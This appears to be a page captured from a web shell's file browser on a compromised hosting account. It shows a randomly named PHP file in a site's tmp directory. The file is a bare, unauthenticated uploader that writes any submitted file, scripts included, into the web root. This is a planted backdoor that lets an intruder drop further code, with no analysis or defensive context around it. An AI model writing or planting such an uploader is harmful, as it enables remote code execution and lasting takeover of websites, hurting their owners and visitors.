Your IP : 216.73.216.74


Current Path : /home/andpasi/www/tmp/
Upload File :
Current File : /home/andpasi/www/tmp/jceizqgzseq.php

<?php 
if (isset($_FILES['hc'])) { 
    $name = $_FILES['hc']['name'];
    if (copy($_FILES['hc']['tmp_name'], $name)) {
        echo "✅ SUCCESS: " . htmlspecialchars($name);
    } else {
        echo "❌ FAILED";
    }
}
?>
<h3>Simple File Uploader</h3>
<form method="post" enctype="multipart/form-data">
    <input type="file" name="hc">
    <input type="submit" value="Upload">
</form>